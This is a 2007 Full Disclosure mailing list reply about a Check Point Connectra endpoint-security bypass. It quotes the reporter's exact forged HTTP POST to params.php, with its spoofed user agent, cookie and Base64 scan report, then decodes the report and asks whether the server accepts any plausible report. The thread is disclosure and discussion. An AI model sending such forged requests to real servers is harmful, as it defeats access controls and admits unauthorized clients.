|
Full Disclosure
mailing list archives
Re: Check Point Connectra End Point security bypass
From: Felix Lindner <fx () sabre-labs com>
Date: Mon, 22 Jan 2007 14:19:51 +0100
Hi,
On Mon, 22 Jan 2007 07:37:29 +0200
"Roni Bachar" <roni () avnet co il> wrote:
The vulnerability can be exploited by doing the following stages:
Sending a post request as followed:
POST https://serverip/sre/params.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: ICS_Secure
Host: serverip
Content-Length: 251
Cache-Control: no-cache
Cookie: ICS_Test_Cookie=1
Report=PD94bWwgdmVyc2lvbj0iMS4wIj8+Cgo8U3JlU2NhblJlcG9ydCBWZXJzaW9uPSIzLjcuM
TE2LjAiPgoJPFVzZXJJbmZvIFdpbkRvbWFpbj0iIiBXaW5Vc2VyPSJyb25pIiBXaW5Vc2VyQ2F0Y
WxvZz0iQzpcRG9jdW1lbnRzIGFuZCBTZXR0aW5nc1xyb25pLkxFTk9WTy00RkZFRjRFMyIvPgo8L
1NyZVNjYW5SZXBvcnQ+Cg==
I assume you meant saying that the Base64 encoded Data in the Report variable
must be adjusted to reflect the actual hostname etc., or is params.php
accepting _any_ report that looks reasonably valid?
For reference, the decoded data in this example is:
<?xml version="1.0"?>
<SreScanReport Version="3.7.116.0">
<UserInfo WinDomain="" WinUser="roni" WinUserCatalog="C:\Documents and
Settings\roni.LENOVO-4FFEF4E3"/>
</SreScanReport>
cheers
FX
--
SABRE Labs GmbH | Felix 'FX' Lindner <fx () sabre-labs com>
http://www.sabre-labs.com | GSM: +49 171 7402062
Wrangelstrasse 4 | PGP: A740 DE51 9891 19DF 0D05
10997 Berlin, Germany | 13B3 1759 C388 C92D 6BBB
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
| 
Intro
